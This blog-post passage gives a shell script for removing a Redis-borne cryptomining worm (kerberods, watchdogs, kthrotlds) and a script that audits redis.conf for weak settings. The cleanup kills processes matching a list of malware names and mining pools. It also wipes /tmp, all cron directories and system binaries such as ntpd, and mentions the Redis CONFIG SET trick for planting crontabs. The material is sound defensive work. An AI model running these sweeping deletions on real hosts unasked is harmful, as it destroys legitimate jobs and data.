ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xig" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "ddgs" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "qW3xT" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "wnTKYg" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "t00ls.ru" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "sustes" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "hashfish" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "kworkerds" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "ksoftirqds" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "watchdogs" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "kthrotlds" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "kerberods" | awk '{print $2}' | xargs kill -9
ps aux | grep an7kmd2wp4xo7hpr | grep -v grep | awk '{print $2}' | xargs kill -9
busybox pkill watchdogs
busybox pkill ksoftirqds
busybox pkill kthrotlds

# Uncomment to list files modified between 10 and 50 days ago when hunting leftovers
#find / -mtime +10 -a -mtime -50 -type f | more

# Dropped binaries and working directories (most carry the immutable bit)
busybox rm /sbin/watchdogs
busybox rm /usr/sbin/watchdogs
busybox rm /usr/sbin/kthrotlds
busybox rm /usr/sbin/ntpd   # in the suspicious process list above; reinstall the ntp package afterwards if the host needs it
busybox rm /etc/init.d/watchdogs
busybox chattr -i /usr/bin/kerberods && busybox rm -rf /usr/bin/kerberods
busybox chattr -i /tmp && busybox rm -rf /tmp/* /tmp/.[!.]*   # empty /tmp; removing the directory itself breaks other services
busybox chattr -i ~/.ntp && busybox rm -rf ~/.ntp
busybox chattr -i ~/.cache && busybox rm -rf ~/.cache
busybox chattr -i /.cache/* && busybox rm -rf /.cache
busybox chattr -i /.cache/.kswapd && busybox rm -rf /.cache/.kswapd

# Replace the cron files with empty, immutable ones so nothing can re-add the job
# (chattr -i them again before restoring legitimate jobs)
busybox chattr -i /var/spool/cron/root && busybox rm /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr +i /var/spool/cron/root
busybox chattr -i /var/spool/cron/crontabs/root && busybox rm /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr +i /var/spool/cron/crontabs/root
busybox chattr -i /etc/cron.d/root && busybox rm /etc/cron.d/root && busybox touch /etc/cron.d/root && busybox chattr +i /etc/cron.d/root
busybox chattr -i /etc/cron.d/* && busybox rm -f /etc/cron.d/*
busybox chattr -i /etc/cron.hourly/* && busybox rm -f /etc/cron.hourly/*
busybox chattr -i /etc/cron.daily/* && busybox rm -f /etc/cron.daily/*
busybox chattr -i /etc/cron.monthly/* && busybox rm -f /etc/cron.monthly/*
busybox chattr -i /etc/cron.weekly/* && busybox rm -f /etc/cron.weekly/*

# Sweep any remaining copies, then a second kill pass now that the files are gone
busybox find / -type f -name '*watchdogs*' | busybox xargs rm -f
busybox find / -type f -name '*kthrotlds*' | busybox xargs rm -f
busybox pkill watchdogs
busybox pkill ksoftirqds
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9
```
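The worm got in through a Redis instance with no password, and a cleanup that leaves that door open is only a pause before the next crontab arrives. The following audit is an added example (not from the original post, and not the worm's logic) that reads a redis.conf and reports the settings that make an instance writable by anyone who can reach port 6379. The two sample configs are constructed here for the demo; which four settings count as "weak" is this example's assumption about a hardened instance.

```shell
#!/bin/sh
# Added example (not from the original post): audit a redis.conf for the
# settings that let an unauthenticated Redis be used to drop files on the host.

# conf_line FILE DIRECTIVE -> the last active (uncommented) line for DIRECTIVE
conf_line() {
    grep -iE "^[[:space:]]*$2([[:space:]]|$)" "$1" | tail -n 1
}

# redis_conf_findings FILE: print one line per weak setting, total in REDIS_FINDINGS
redis_conf_findings() {
    f=$1
    REDIS_FINDINGS=0

    # No requirepass: anyone who can reach the port gets every command, including
    # CONFIG SET dir/dbfilename + SAVE, the usual way a worm writes a crontab or an
    # authorized_keys file through Redis
    if [ -z "$(conf_line "$f" requirepass)" ]; then
        echo "requirepass not set"
        REDIS_FINDINGS=$((REDIS_FINDINGS + 1))
    fi

    # bind: absent, 0.0.0.0 or * means every interface, including the public one
    b=$(conf_line "$f" bind)
    if [ -z "$b" ] || echo "$b" | grep -qE '(^|[[:space:]])(0\.0\.0\.0|\*)([[:space:]]|$)'; then
        echo "bind: listens on all interfaces (${b:-no bind line})"
        REDIS_FINDINGS=$((REDIS_FINDINGS + 1))
    fi

    # protected-mode (Redis >= 3.2) refuses remote clients when there is no password
    # and no bind; switching it off removes that last safety net
    if conf_line "$f" protected-mode | grep -qiE '[[:space:]]no$'; then
        echo "protected-mode no"
        REDIS_FINDINGS=$((REDIS_FINDINGS + 1))
    fi

    # CONFIG should be renamed away (or to an unguessable name) so that even an
    # authenticated client cannot point the RDB dump at cron or .ssh
    if ! grep -qiE '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$f"; then
        echo "CONFIG command not renamed"
        REDIS_FINDINGS=$((REDIS_FINDINGS + 1))
    fi
    return 0
}

# Constructed sample configs for the demo (no password, all interfaces,
# protected-mode off, versus the same instance with the four settings fixed)
write_weak_conf() {
    printf 'port 6379\nbind 0.0.0.0\nprotected-mode no\ndaemonize yes\n' > "$1"
}
write_hardened_conf() {
    printf 'port 6379\nbind 127.0.0.1\nprotected-mode yes\nrequirepass REPLACE-WITH-A-LONG-RANDOM-SECRET\nrename-command CONFIG ""\n' > "$1"
}

# Stand-alone demo; on a real host run: redis_conf_findings /etc/redis.conf
T=$(mktemp)
write_weak_conf "$T";     echo "weak config:";     redis_conf_findings "$T"; echo "  findings: $REDIS_FINDINGS"
write_hardened_conf "$T"; echo "hardened config:"; redis_conf_findings "$T"; echo "  findings: $REDIS_FINDINGS"
rm -f "$T"
```

The weak sample yields four findings, the hardened one none. The requirepass placeholder must be replaced with a long random value; a short password on Redis is brute-forced in seconds because AUTH has no rate limit.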

Copyright belongs to the author. Contact the author for reprinting or content cooperation.